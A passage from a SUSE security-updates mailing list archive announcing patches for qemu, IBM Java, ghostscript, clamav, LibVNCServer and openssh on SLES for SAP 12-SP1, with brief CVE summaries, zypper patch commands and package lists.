the 'msg_len' field has an invalid value. A user/process could use this flaw to crash the Qemu process resulting in DoS (bsc#1114422). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1077=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): qemu-2.3.1-33.17.1 qemu-block-curl-2.3.1-33.17.1 qemu-block-curl-debuginfo-2.3.1-33.17.1 qemu-block-rbd-2.3.1-33.17.1 qemu-block-rbd-debuginfo-2.3.1-33.17.1 qemu-debugsource-2.3.1-33.17.1 qemu-guest-agent-2.3.1-33.17.1 qemu-guest-agent-debuginfo-2.3.1-33.17.1 qemu-kvm-2.3.1-33.17.1 qemu-lang-2.3.1-33.17.1 qemu-tools-2.3.1-33.17.1 qemu-tools-debuginfo-2.3.1-33.17.1 qemu-x86-2.3.1-33.17.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch): qemu-ipxe-1.0.0-33.17.1 qemu-seabios-1.8.1-33.17.1 qemu-sgabios-8-33.17.1 qemu-vgabios-1.8.1-33.17.1 References: https://www.suse.com/security/cve/CVE-2018-10839.html https://www.suse.com/security/cve/CVE-2018-15746.html https://www.suse.com/security/cve/CVE-2018-17958.html https://www.suse.com/security/cve/CVE-2018-17962.html https://www.suse.com/security/cve/CVE-2018-17963.html https://www.suse.com/security/cve/CVE-2018-18849.html https://bugzilla.suse.com/1106222 https://bugzilla.suse.com/1110910 https://bugzilla.suse.com/1111006 https://bugzilla.suse.com/1111010 https://bugzilla.suse.com/1111013 https://bugzilla.suse.com/1114422 From sle-security-updates at lists.suse.com Sat Apr 27 16:37:33 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:37:33 +0200 (CEST) Subject: SUSE-SU-2018:4064-2: important: Security update for java-1_8_0-ibm Message-ID: <20190427223733.DAF79F3D3@maintenance.suse.de> SUSE Security Update: Security update for java-1_8_0-ibm ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:4064-2 Rating: important References: #1116574 Cross-References: CVE-2018-13785 CVE-2018-3136 CVE-2018-3139 CVE-2018-3149 CVE-2018-3169 CVE-2018-3180 CVE-2018-3183 CVE-2018-3214 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes 8 vulnerabilities is now available. Description: java-1_8_0-ibm was updated to Java 8.0 Service Refresh 5 Fix Pack 25 (bsc#1116574) * Class Libraries: - IJ10934 CVE-2018-13785 - IJ10935 CVE-2018-3136 - IJ10895 CVE-2018-3139 - IJ10932 CVE-2018-3149 - IJ10894 CVE-2018-3180 - IJ10930 CVE-2018-3183 - IJ10933 CVE-2018-3214 - IJ09315 FLOATING POINT EXCEPTION FROM JAVA.TEXT.DECIMALFORMAT. FORMAT - IJ09088 INTRODUCING A NEW PROPERTY FOR TURKEY TIMEZONE FOR PRODUCTS NOT IDENTIFYING TRT - IJ10800 REMOVE EXPIRING ROOT CERTIFICATES IN IBM JDK???S CACERTS. - IJ10566 SUPPORT EBCDIC CODE PAGE IBM-274 ??? BELGIUM EBCDIC * Java Virtual Machine - IJ08730 APPLICATION SIGNAL HANDLER NOT INVOKED FOR SIGABRT - IJ10453 ASSERTION FAILURE AT CLASSPATHITEM.CPP - IJ09574 CLASSLOADER DEFINED THROUGH SYSTEM PROPERTY ???JAVA.SYSTEM.CLASS.LOADE R??? IS NOT HONORED. - IJ10931 CVE-2018-3169 - IJ10618 GPU SORT: UNSPECIFIED LAUNCH FAILURE - IJ10619 INCORRECT ILLEGALARGUMENTEXCEPTION BECAUSE OBJECT IS NOT AN INSTANCE OF DECLARING CLASS ON REFLECTIVE INVOCATION - IJ10135 JVM HUNG IN GARBAGECOLLECTORMXBEAN.G ETLASTGCINFO() API - IJ10680 RECURRENT ABORTED SCAVENGE * ORB - IX90187 CLIENTREQUESTIMPL.REINVO KE FAILS WITH JAVA.LANG.INDEXOUTOFBOUN DSEXCEPTION * Reliability and Serviceability - IJ09600 DTFJ AND JDMPVIEW FAIL TO PARSE WIDE REGISTER VALUES * Security - IJ10492 'EC KEYSIZE < 384' IS NOT HONORED USING THE 'JDK.TLS.DISABLEDALGORIT HMS' SECURITY PROPERTY - IJ10310 ADD NULL CHECKING ON THE ENCRYPTION TYPES LIST TO CREDENTIALS.GETDEFAULTNA TIVECREDS() METHOD - IJ10491 AES/GCM CIPHER ??? AAD NOT RESET TO UN-INIT STATE AFTER DOFINAL( ) AND INIT( ) - IJ08442 HTTP PUBLIC KEY PINNING FINGERPRINT,PROBLEM WITH CONVERTING TO JKS KEYSTORE - IJ09107 IBMPKCS11IMPL CRYPTO PROVIDER ??? INTERMITTENT ERROR WITH SECP521R1 SIGNATURE ON Z/OS - IJ10136 IBMPKCS11IMPL ??? INTERMITTENT ERROR WITH SECP521R1 SIG ON Z/OS AND Z/LINUX - IJ08530 IBMPKCS11IMPL PROVIDER USES THE WRONG RSA CIPHER MECHANISM FOR THE RSA/ECB/PKCS1PADDING CIPHER - IJ08723 JAAS THROWS A ???ARRAY INDEX OUT OF RANGE??? EXCEPTION - IJ08704 THE SECURITY PROPERTY ???JDK.CERTPATH.DISABLEDAL GORITHMS??? IS MISTAKENLY BEING USED TO FILTER JAR SIGNING ALGORITHMS * z/OS Extentions - PH03889 ADD SUPPORT FOR TRY-WITH-RESOURCES TO COM.IBM.JZOS.ENQUEUE - PH03414 ROLLOVER FROM SYE TO SAE FOR ICSF REASON CODE 3059 - PH04008 ZERTJSSE ??? Z SYSTEMS ENCRYPTION READINESS TOOL (ZERT) NEW SUPPORT IN THE Z/OS JAVA SDK This includes the update to Java 8.0 Service Refresh 5 Fix Pack 22: * Java Virtual Machine - IJ09139 CUDA4J NOT AVAILABLE ON ALL PLATFORMS * JIT Compiler - IJ09089 CRASH DURING COMPILATION IN USEREGISTER ON X86-32 - IJ08655 FLOATING POINT ERROR (SIGFPE) IN ZJ9SYM1 OR ANY VM/JIT MODULE ON AN INSTRUCTION FOLLOWING A VECTOR INSTRUCTION - IJ08850 CRASH IN ARRAYLIST$ITR.NEXT() - IJ09601 JVM CRASHES ON A SIGBUS SIGNAL WHEN ACCESSING A DIRECTBYTEBUFFER * z/OS Extentions - PH02999 JZOS data management classes accept dataset names in code pages supported by z/OS system services - PH01244 OUTPUT BUFFER TOO SHORT FOR GCM MODE ENCRYPTION USING IBMJCEHYBRID Also the update to Java 8.0 Service Refresh 5 Fix Pack 21 * Class Libraries - IJ08569 JAVA.IO.IOEXCEPTION OCCURS WHEN A FILECHANNEL IS BIGGER THAN 2GB ON AIX PLATFORM - IJ08570 JAVA.LANG.UNSATISFIEDLIN KERROR WITH JAVA OPTION -DSUN.JAVA2D.CMM=SUN.JAV A2D.CMM.KCMS.KCMSSERVICE PROVIDER ON AIX PLATFORM * Java Virtual Machine - IJ08001 30% THROUGHPUT DROP FOR CERTAIN SYNCHRONIZATION WORKLOADS - IJ07997 TRACEASSERT IN GARBAGE COLLECTOR(MEMORYSUBSPACE) * JIT Compiler - IJ08503 ASSERTION IS HIT DUE TO UNEXPECTED STACK HEIGHT IN DEBUGGING MODE - IJ08375 CRASH DURING HARDWARE GENERATED GUARDED STORAGE EVENT WITHIN A TRANSACTIONAL EXECUTION REGION WHEN RUNNING WITH -XGC:CONCURRENTS - IJ08205 CRASH WHILE COMPILING - IJ09575 INCORRECT RESULT WHEN USING JAVA.LANG.MATH.MIN OR MAX ON 31-BIT JVM - IJ07886 INCORRECT CALUCATIONS WHEN USING NUMBERFORMAT.FORMAT() AND BIGDECIMAL.{FLOAT/DOUBLE }VALUE() Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1072=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): java-1_8_0-ibm-1.8.0_sr5.25-30.39.1 java-1_8_0-ibm-alsa-1.8.0_sr5.25-30.39.1 java-1_8_0-ibm-devel-1.8.0_sr5.25-30.39.1 java-1_8_0-ibm-plugin-1.8.0_sr5.25-30.39.1 References: https://www.suse.com/security/cve/CVE-2018-13785.html https://www.suse.com/security/cve/CVE-2018-3136.html https://www.suse.com/security/cve/CVE-2018-3139.html https://www.suse.com/security/cve/CVE-2018-3149.html https://www.suse.com/security/cve/CVE-2018-3169.html https://www.suse.com/security/cve/CVE-2018-3180.html https://www.suse.com/security/cve/CVE-2018-3183.html https://www.suse.com/security/cve/CVE-2018-3214.html https://bugzilla.suse.com/1116574 From sle-security-updates at lists.suse.com Sat Apr 27 16:38:06 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:38:06 +0200 (CEST) Subject: SUSE-SU-2018:4090-2: important: Security update for ghostscript Message-ID: <20190427223806.D3C24F3D3@maintenance.suse.de> SUSE Security Update: Security update for ghostscript ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:4090-2 Rating: important References: #1109105 #1111479 #1111480 #1112229 #1117022 #1117274 #1117313 #1117327 #1117331 Cross-References: CVE-2018-17183 CVE-2018-17961 CVE-2018-18073 CVE-2018-18284 CVE-2018-19409 CVE-2018-19475 CVE-2018-19476 CVE-2018-19477 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that solves 8 vulnerabilities and has one errata is now available. Description: This update for ghostscript to version 9.26 fixes the following issues: Security issues fixed: - CVE-2018-19475: Fixed bypass of an intended access restriction in psi/zdevice2.c (bsc#1117327) - CVE-2018-19476: Fixed bypass of an intended access restriction in psi/zicc.c (bsc#1117313) - CVE-2018-19477: Fixed bypass of an intended access restriction in psi/zfjbig2.c (bsc#1117274) - CVE-2018-19409: Check if another device is used correctly in LockSafetyParams (bsc#1117022) - CVE-2018-18284: Fixed potential sandbox escape through 1Policy operator (bsc#1112229) - CVE-2018-18073: Fixed leaks through operator in saved execution stacks (bsc#1111480) - CVE-2018-17961: Fixed a -dSAFER sandbox escape by bypassing executeonly (bsc#1111479) - CVE-2018-17183: Fixed a potential code injection by specially crafted PostScript files (bsc#1109105) Version update to 9.26 (bsc#1117331): - Security issues have been the primary focus - Minor bug fixes and improvements - For release summary see: http://www.ghostscript.com/doc/9.26/News.htm Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1076=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): ghostscript-9.26-23.16.1 ghostscript-debuginfo-9.26-23.16.1 ghostscript-debugsource-9.26-23.16.1 ghostscript-x11-9.26-23.16.1 ghostscript-x11-debuginfo-9.26-23.16.1 libspectre-debugsource-0.2.7-12.4.1 libspectre1-0.2.7-12.4.1 libspectre1-debuginfo-0.2.7-12.4.1 References: https://www.suse.com/security/cve/CVE-2018-17183.html https://www.suse.com/security/cve/CVE-2018-17961.html https://www.suse.com/security/cve/CVE-2018-18073.html https://www.suse.com/security/cve/CVE-2018-18284.html https://www.suse.com/security/cve/CVE-2018-19409.html https://www.suse.com/security/cve/CVE-2018-19475.html https://www.suse.com/security/cve/CVE-2018-19476.html https://www.suse.com/security/cve/CVE-2018-19477.html https://bugzilla.suse.com/1109105 https://bugzilla.suse.com/1111479 https://bugzilla.suse.com/1111480 https://bugzilla.suse.com/1112229 https://bugzilla.suse.com/1117022 https://bugzilla.suse.com/1117274 https://bugzilla.suse.com/1117313 https://bugzilla.suse.com/1117327 https://bugzilla.suse.com/1117331 From sle-security-updates at lists.suse.com Sat Apr 27 16:39:45 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:39:45 +0200 (CEST) Subject: SUSE-SU-2018:3436-2: moderate: Security update for clamav Message-ID: <20190427223945.1B2FBF3D3@maintenance.suse.de> SUSE Security Update: Security update for clamav ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:3436-2 Rating: moderate References: #1103040 #1104457 #1110723 Cross-References: CVE-2018-14680 CVE-2018-14681 CVE-2018-14682 CVE-2018-15378 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes four vulnerabilities is now available. Description: This update for clamav fixes the following issues: clamav was updated to version 0.100.2: - CVE-2018-15378: Vulnerability in ClamAV's MEW unpacking feature that could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. (bsc#1110723) - CVE-2018-14680, CVE-2018-14681, CVE-2018-14682: more fixes for embedded libmspack. (bsc#1103040) - Make freshclam more robust against lagging signature mirrors. - On-Access "Extra Scanning", an opt-in minor feature of OnAccess scanning on Linux systems, has been disabled due to a known issue with resource cleanup OnAccessExtraScanning will be re-enabled in a future release when the issue is resolved. In the mean-time, users who enabled the feature in clamd.conf will see a warning informing them that the feature is not active. For details, see: https://bugzilla.clamav.net/show_bug.cgi?id=12048 - Restore exit code compatibility of freshclam with versions before 0.100.0 when the virus database is already up to date (bsc#1104457). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1071=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): clamav-0.100.2-33.18.1 clamav-debuginfo-0.100.2-33.18.1 clamav-debugsource-0.100.2-33.18.1 References: https://www.suse.com/security/cve/CVE-2018-14680.html https://www.suse.com/security/cve/CVE-2018-14681.html https://www.suse.com/security/cve/CVE-2018-14682.html https://www.suse.com/security/cve/CVE-2018-15378.html https://bugzilla.suse.com/1103040 https://bugzilla.suse.com/1104457 https://bugzilla.suse.com/1110723 From sle-security-updates at lists.suse.com Sat Apr 27 16:40:32 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:40:32 +0200 (CEST) Subject: SUSE-SU-2018:3933-2: important: Security update for java-1_7_1-ibm Message-ID: <20190427224032.9370DF3D3@maintenance.suse.de> SUSE Security Update: Security update for java-1_7_1-ibm ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:3933-2 Rating: important References: #1116574 Cross-References: CVE-2018-13785 CVE-2018-3136 CVE-2018-3139 CVE-2018-3149 CVE-2018-3169 CVE-2018-3180 CVE-2018-3214 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes 7 vulnerabilities is now available. Description: java-1_7_1-ibm was updated to Java 7.1 Service Refresh 4 Fix Pack 35 (bsc#1116574): * Consumability - IJ10515 AIX JAVA 7.1.3.10 GENERAL PROTECTION FAULT WHEN ATTEMPTING TO USE HEALTH CENTER API * Class Libraries - IJ10934 CVE-2018-13785 - IJ10935 CVE-2018-3136 - IJ10895 CVE-2018-3139 - IJ10932 CVE-2018-3149 - IJ10894 CVE-2018-3180 - IJ10933 CVE-2018-3214 - IJ09315 FLOATING POINT EXCEPTION FROM JAVA.TEXT.DECIMALFORMAT. FORMAT - IJ09088 INTRODUCING A NEW PROPERTY FOR TURKEY TIMEZONE FOR PRODUCTS NOT IDENTIFYING TRT - IJ08569 JAVA.IO.IOEXCEPTION OCCURS WHEN A FILECHANNEL IS BIGGER THAN 2GB ON AIX PLATFORM - IJ10800 REMOVE EXPIRING ROOT CERTIFICATES IN IBM JDK???S CACERTS. * Java Virtual Machine - IJ10931 CVE-2018-3169 - IV91132 SOME CORE PATTERN SPECIFIERS ARE NOT HANDLED BY THE JVM ON LINUX * JIT Compiler - IJ08205 CRASH WHILE COMPILING - IJ07886 INCORRECT CALUCATIONS WHEN USING NUMBERFORMAT.FORMAT() AND BIGDECIMAL.{FLOAT/DOUBLE }VALUE() * ORB - IX90187 CLIENTREQUESTIMPL.REINVO KE FAILS WITH JAVA.LANG.INDEXOUTOFBOUN DSEXCEPTION * Security - IJ10492 'EC KEYSIZE < 384' IS NOT HONORED USING THE 'JDK.TLS.DISABLEDALGORIT HMS' SECURITY PROPERTY - IJ10491 AES/GCM CIPHER ??? AAD NOT RESET TO UN-INIT STATE AFTER DOFINAL( ) AND INIT( ) - IJ08442 HTTP PUBLIC KEY PINNING FINGERPRINT,PROBLEM WITH CONVERTING TO JKS KEYSTORE - IJ09107 IBMPKCS11IMPL CRYPTO PROVIDER ??? INTERMITTENT ERROR WITH SECP521R1 SIGNATURE ON Z/OS - IJ10136 IBMPKCS11IMPL ??? INTERMITTENT ERROR WITH SECP521R1 SIG ON Z/OS AND Z/LINUX - IJ08530 IBMPKCS11IMPL PROVIDER USES THE WRONG RSA CIPHER MECHANISM FOR THE RSA/ECB/PKCS1PADDING CIPHER - IJ08723 JAAS THROWS A ???ARRAY INDEX OUT OF RANGE??? EXCEPTION - IJ08704 THE SECURITY PROPERTY ???JDK.CERTPATH.DISABLEDAL GORITHMS??? IS MISTAKENLY BEING USED TO FILTER JAR SIGNING ALGORITHMS * z/OS Extentions - PH01244 OUTPUT BUFFER TOO SHORT FOR GCM MODE ENCRYPTION USING IBMJCEHYBRID Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1068=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): java-1_7_1-ibm-1.7.1_sr4.35-38.29.1 java-1_7_1-ibm-alsa-1.7.1_sr4.35-38.29.1 java-1_7_1-ibm-devel-1.7.1_sr4.35-38.29.1 java-1_7_1-ibm-jdbc-1.7.1_sr4.35-38.29.1 java-1_7_1-ibm-plugin-1.7.1_sr4.35-38.29.1 References: https://www.suse.com/security/cve/CVE-2018-13785.html https://www.suse.com/security/cve/CVE-2018-3136.html https://www.suse.com/security/cve/CVE-2018-3139.html https://www.suse.com/security/cve/CVE-2018-3149.html https://www.suse.com/security/cve/CVE-2018-3169.html https://www.suse.com/security/cve/CVE-2018-3180.html https://www.suse.com/security/cve/CVE-2018-3214.html https://bugzilla.suse.com/1116574 From sle-security-updates at lists.suse.com Sat Apr 27 16:41:07 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sun, 28 Apr 2019 00:41:07 +0200 (CEST) Subject: SUSE-SU-2018:2975-3: important: Security update for ghostscript Message-ID: <20190427224107.3C066F3D3@maintenance.suse.de> SUSE Security Update: Security update for ghostscript ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:2975-3 Rating: important References: #1106171 #1106172 #1106173 #1106195 #1107410 #1107411 #1107412 #1107413 #1107420 #1107421 #1107422 #1107423 #1107426 #1107581 #1108027 #1109105 Cross-References: CVE-2018-15908 CVE-2018-15909 CVE-2018-15910 CVE-2018-15911 CVE-2018-16509 CVE-2018-16510 CVE-2018-16511 CVE-2018-16513 CVE-2018-16539 CVE-2018-16540 CVE-2018-16541 CVE-2018-16542 CVE-2018-16543 CVE-2018-16585 CVE-2018-16802 CVE-2018-17183 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes 16 vulnerabilities is now available. Description: This update for ghostscript to version 9.25 fixes the following issues: These security issues were fixed: - CVE-2018-17183: Remote attackers were be able to supply crafted PostScript to potentially overwrite or replace error handlers to inject code (bsc#1109105) - CVE-2018-15909: Prevent type confusion using the .shfill operator that could have been used by attackers able to supply crafted PostScript files to crash the interpreter or potentially execute code (bsc#1106172). - CVE-2018-15908: Prevent attackers that are able to supply malicious PostScript files to bypass .tempfile restrictions and write files (bsc#1106171). - CVE-2018-15910: Prevent a type confusion in the LockDistillerParams parameter that could have been used to crash the interpreter or execute code (bsc#1106173). - CVE-2018-15911: Prevent use uninitialized memory access in the aesdecode operator that could have been used to crash the interpreter or potentially execute code (bsc#1106195). - CVE-2018-16513: Prevent a type confusion in the setcolor function that could have been used to crash the interpreter or possibly have unspecified other impact (bsc#1107412). - CVE-2018-16509: Incorrect "restoration of privilege" checking during handling of /invalidaccess exceptions could be have been used by attackers able to supply crafted PostScript to execute code using the "pipe" instruction (bsc#1107410). - CVE-2018-16510: Incorrect exec stack handling in the "CS" and "SC" PDF primitives could have been used by remote attackers able to supply crafted PDFs to crash the interpreter or possibly have unspecified other impact (bsc#1107411). - CVE-2018-16542: Prevent attackers able to supply crafted PostScript files from using insufficient interpreter stack-size checking during error handling to crash the interpreter (bsc#1107413). - CVE-2018-16541: Prevent attackers able to supply crafted PostScript files from using incorrect free logic in pagedevice replacement to crash the interpreter (bsc#1107421). - CVE-2018-16540: Prevent use-after-free in copydevice handling that could have been used to crash the interpreter or possibly have unspecified other impact (bsc#1107420). - CVE-2018-16539: Prevent attackers able to supply crafted PostScript files from using incorrect access checking in temp file handling to disclose contents of files on the system otherwise not readable (bsc#1107422). - CVE-2018-16543: gssetresolution and gsgetresolution allowed attackers to have an unspecified impact (bsc#1107423). - CVE-2018-16511: A type confusion in "ztype" could have been used by remote attackers able to supply crafted PostScript to crash the interpreter or possibly have unspecified other impact (bsc#1107426). - CVE-2018-16585: The .setdistillerkeys PostScript command was accepted even though it is not intended for use during document processing (e.g., after the startup phase). This lead to memory corruption, allowing remote attackers able to supply crafted PostScript to crash the interpreter or possibly have unspecified other impact (bsc#1107581). - CVE-2018-16802: Incorrect "restoration of privilege" checking when running out of stack during exception handling could have been used by attackers able to supply crafted PostScript to execute code using the "pipe" instruction. This is due to an incomplete fix for CVE-2018-16509 (bsc#1108027). These non-security issues were fixed: * Fixes problems with argument handling, some unintended results of the security fixes to the SAFER file access restrictions (specifically accessing ICC profile files). * Avoid that ps2epsi fails with 'Error: /undefined in --setpagedevice--' For additional changes please check http://www.ghostscript.com/doc/9.25/News.htm and the changes file of the package. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1074=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): ghostscript-9.25-23.13.1 ghostscript-debuginfo-9.25-23.13.1 ghostscript-debugsource-9.25-23.13.1 ghostscript-x11-9.25-23.13.1 ghostscript-x11-debuginfo-9.25-23.13.1 References: https://www.suse.com/security/cve/CVE-2018-15908.html https://www.suse.com/security/cve/CVE-2018-15909.html https://www.suse.com/security/cve/CVE-2018-15910.html https://www.suse.com/security/cve/CVE-2018-15911.html https://www.suse.com/security/cve/CVE-2018-16509.html https://www.suse.com/security/cve/CVE-2018-16510.html https://www.suse.com/security/cve/CVE-2018-16511.html https://www.suse.com/security/cve/CVE-2018-16513.html https://www.suse.com/security/cve/CVE-2018-16539.html https://www.suse.com/security/cve/CVE-2018-16540.html https://www.suse.com/security/cve/CVE-2018-16541.html https://www.suse.com/security/cve/CVE-2018-16542.html https://www.suse.com/security/cve/CVE-2018-16543.html https://www.suse.com/security/cve/CVE-2018-16585.html https://www.suse.com/security/cve/CVE-2018-16802.html https://www.suse.com/security/cve/CVE-2018-17183.html https://bugzilla.suse.com/1106171 https://bugzilla.suse.com/1106172 https://bugzilla.suse.com/1106173 https://bugzilla.suse.com/1106195 https://bugzilla.suse.com/1107410 https://bugzilla.suse.com/1107411 https://bugzilla.suse.com/1107412 https://bugzilla.suse.com/1107413 https://bugzilla.suse.com/1107420 https://bugzilla.suse.com/1107421 https://bugzilla.suse.com/1107422 https://bugzilla.suse.com/1107423 https://bugzilla.suse.com/1107426 https://bugzilla.suse.com/1107581 https://bugzilla.suse.com/1108027 https://bugzilla.suse.com/1109105 From sle-security-updates at lists.suse.com Mon Apr 29 04:11:57 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 29 Apr 2019 12:11:57 +0200 (CEST) Subject: SUSE-SU-2019:0313-2: critical: Security update for LibVNCServer Message-ID: <20190429101157.48657F3D3@maintenance.suse.de> SUSE Security Update: Security update for LibVNCServer ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0313-2 Rating: critical References: #1123823 #1123828 #1123832 Cross-References: CVE-2018-20748 CVE-2018-20749 CVE-2018-20750 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for LibVNCServer fixes the following issues: Security issues fixed: - CVE-2018-20749: Fixed a heap out of bounds write vulnerability in rfbserver.c (bsc#1123828) - CVE-2018-20750: Fixed a heap out of bounds write vulnerability in rfbserver.c (bsc#1123832) - CVE-2018-20748: Fixed multiple heap out-of-bound writes in VNC client code (bsc#1123823) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-313=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): LibVNCServer-debugsource-0.9.9-17.11.1 libvncclient0-0.9.9-17.11.1 libvncclient0-debuginfo-0.9.9-17.11.1 libvncserver0-0.9.9-17.11.1 libvncserver0-debuginfo-0.9.9-17.11.1 References: https://www.suse.com/security/cve/CVE-2018-20748.html https://www.suse.com/security/cve/CVE-2018-20749.html https://www.suse.com/security/cve/CVE-2018-20750.html https://bugzilla.suse.com/1123823 https://bugzilla.suse.com/1123828 https://bugzilla.suse.com/1123832 From sle-security-updates at lists.suse.com Mon Apr 29 04:15:39 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 29 Apr 2019 12:15:39 +0200 (CEST) Subject: SUSE-SU-2019:0060-2: important: Security update for LibVNCServer Message-ID: <20190429101539.36816F3D3@maintenance.suse.de> SUSE Security Update: Security update for LibVNCServer ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0060-2 Rating: important References: #1120114 #1120115 #1120116 #1120117 #1120118 #1120119 #1120120 #1120121 #1120122 Cross-References: CVE-2018-15126 CVE-2018-15127 CVE-2018-20019 CVE-2018-20020 CVE-2018-20021 CVE-2018-20022 CVE-2018-20023 CVE-2018-20024 CVE-2018-6307 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes 9 vulnerabilities is now available. Description: This update for LibVNCServer fixes the following issues: Security issues fixed: - CVE-2018-15126: Fixed use-after-free in file transfer extension (bsc#1120114) - CVE-2018-6307: Fixed use-after-free in file transfer extension server code (bsc#1120115) - CVE-2018-20020: Fixed heap out-of-bound write inside structure in VNC client code (bsc#1120116) - CVE-2018-15127: Fixed heap out-of-bounds write in rfbserver.c (bsc#1120117) - CVE-2018-20019: Fixed multiple heap out-of-bound writes in VNC client code (bsc#1120118) - CVE-2018-20023: Fixed information disclosure through improper initialization in VNC Repeater client code (bsc#1120119) - CVE-2018-20022: Fixed information disclosure through improper initialization in VNC client code (bsc#1120120) - CVE-2018-20024: Fixed NULL pointer dereference in VNC client code (bsc#1120121) - CVE-2018-20021: Fixed infinite loop in VNC client code (bsc#1120122) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-60=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): LibVNCServer-debugsource-0.9.9-17.8.1 libvncclient0-0.9.9-17.8.1 libvncclient0-debuginfo-0.9.9-17.8.1 libvncserver0-0.9.9-17.8.1 libvncserver0-debuginfo-0.9.9-17.8.1 References: https://www.suse.com/security/cve/CVE-2018-15126.html https://www.suse.com/security/cve/CVE-2018-15127.html https://www.suse.com/security/cve/CVE-2018-20019.html https://www.suse.com/security/cve/CVE-2018-20020.html https://www.suse.com/security/cve/CVE-2018-20021.html https://www.suse.com/security/cve/CVE-2018-20022.html https://www.suse.com/security/cve/CVE-2018-20023.html https://www.suse.com/security/cve/CVE-2018-20024.html https://www.suse.com/security/cve/CVE-2018-6307.html https://bugzilla.suse.com/1120114 https://bugzilla.suse.com/1120115 https://bugzilla.suse.com/1120116 https://bugzilla.suse.com/1120117 https://bugzilla.suse.com/1120118 https://bugzilla.suse.com/1120119 https://bugzilla.suse.com/1120120 https://bugzilla.suse.com/1120121 https://bugzilla.suse.com/1120122 From sle-security-updates at lists.suse.com Mon Apr 29 04:17:15 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 29 Apr 2019 12:17:15 +0200 (CEST) Subject: SUSE-SU-2018:3776-2: moderate: Security update for openssh Message-ID: <20190429101715.B70C7F3D3@maintenance.suse.de> SUSE Security Update: Security update for openssh ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:3776-2 Rating: moderate References: #1091396 #1105010 #1106163 #964336 #982273 Cross-References: CVE-2018-15473 CVE-2018-15919 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that solves two vulnerabilities and has three fixes is now available. Description: This update for openssh fixes the following issues: Following security issues have been fixed: - CVE-2018-15919: Remotely observable behaviour in auth-gss2.c in OpenSSH could be used by remote attackers to detect existence of users on a target system when GSS2 is in use. OpenSSH developers do not want to treat such a username enumeration (or "oracle") as a vulnerability. (bsc#1106163) - CVE-2018-15473: OpenSSH was prone to a user existance oracle vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, 